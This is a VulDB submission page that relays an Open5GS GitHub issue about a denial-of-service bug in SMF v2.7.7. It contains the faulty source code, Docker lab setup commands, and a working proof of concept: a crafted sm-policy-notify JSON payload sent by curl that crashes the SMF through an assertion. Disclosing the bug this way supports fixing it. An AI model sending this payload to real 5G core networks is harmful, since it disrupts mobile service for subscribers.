| 标题 | Open5gs SMF v2.7.7 Denial of Service |
|---|
| 描述 | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
SMF crashes when an `sm-policy-notify` callback carries a `SmPolicyDecision`
whose referenced `qosDecs[*].arp.preemptCap` string is not one of the expected
OpenAPI enum values.
The OpenAPI enum decoder returns `0` for unknown strings instead of rejecting
the request:
```c
OpenAPI_preemption_capability_e OpenAPI_preemption_capability_FromString(char* s)
{
...
return 0;
}
```
SMF later assumes the enum was valid and asserts that
`pre_emption_capability` was set:
```c
if (QosData->arp->preempt_cap == OpenAPI_preemption_capability_NOT_PREEMPT)
pcc_rule->qos.arp.pre_emption_capability = OGS_5GC_PRE_EMPTION_DISABLED;
else if (QosData->arp->preempt_cap == OpenAPI_preemption_capability_MAY_PREEMPT)
pcc_rule->qos.arp.pre_emption_capability = OGS_5GC_PRE_EMPTION_ENABLED;
ogs_assert(pcc_rule->qos.arp.pre_emption_capability);
```
So a semantically invalid policy update aborts the whole SMF process instead of
returning a normal `400` response.
This issue is distinct from the existing `missing-flowDescription` and
`oversized-flowInfos` reports in `report/smf/`; it uses a different malformed
field and crashes on a different assertion.
### Steps to reproduce
1. Start the Open5GS live Docker lab.
2. Bring up UERANSIM gNB and UE with the provided configs:
```bash
docker run -d --rm --name smf-audit-gnb \
--network open5gs --network-alias gnb.ueransim.org \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/gnb.yaml:/ueransim/config/gnb.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-gnb -c /ueransim/config/gnb.yaml
docker run -d --rm --name smf-audit-ue \
--network open5gs --network-alias ue.ueransim.org \
--cap-add NET_ADMIN --privileged \
-v /home/ubuntu/docker-open5gs/configs/internal/ueransim/ue.yaml:/ueransim/config/ue.yaml:ro \
free5gc/ueransim:latest /ueransim/nr-ue -c /ueransim/config/ue.yaml -r
```
3. Wait until the UE log shows:
```text
PDU Session establishment is successful PSI[1]
```
4. Send the forged callback to the active `smContextRef` (`1` in this run):
```bash
payload=$(python3 - <<'PY'
import json
body={
"smPolicyDecision":{
"pccRules":{
"r1":{
"pccRuleId":"r1",
"precedence":1,
"refQosData":["q1"]
}
},
"qosDecs":{
"q1":{
"qosId":"q1",
"5qi":1,
"priorityLevel":1,
"arp":{
"priorityLevel":1,
"preemptCap":"BOOM",
"preemptVuln":"PREEMPTABLE"
}
}
}
}
}
print(json.dumps(body, separators=(",", ":")))
PY
)
curl --http2-prior-knowledge -m 5 -sS -i \
-X POST http://10.33.33.10/nsmf-callback/v1/sm-policy-notify/1/update \
-H 'content-type: application/json' \
--data "$payload"
```
5. Check SMF state and logs:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' smf
docker logs --since 2026-04-10T20:43:35Z smf
```
### Logs
```shell
curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream
exited 139 2026-04-10T20:43:42.982345789Z
04/10 20:43:42.874: [smf] FATAL: update_authorized_pcc_rule_and_qos: Assertion `pcc_rule->qos.arp.pre_emption_capability' failed. (../src/smf/npcf-handler.c:231)
```
### Expected behaviour
SMF should reject unknown `preemptCap` values with a normal HTTP error response.
### Observed Behaviour
The callback aborts the HTTP/2 stream and the SMF process exits with code `139`.
### eNodeB/gNodeB
UERANSIM gNB v3.2.7
### UE Models and versions
UERANSIM gNB v3.2.7 |
|---|
| 来源 | ⚠️ https://github.com/open5gs/open5gs/issues/4442 |
|---|
| 用户 | LinZiyu (UID 94035) |
|---|
| 提交 | 2026-04-20 20時57分 (2 月前) |
|---|
| 管理 | 2026-05-10 16時40分 (20 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 362545 [Open5GS 直到 2.7.7 SMF /src/smf/npcf-handler.c update_authorized_pcc_rule_and_qos 拒绝服务] |
|---|
| 积分 | 20 |
|---|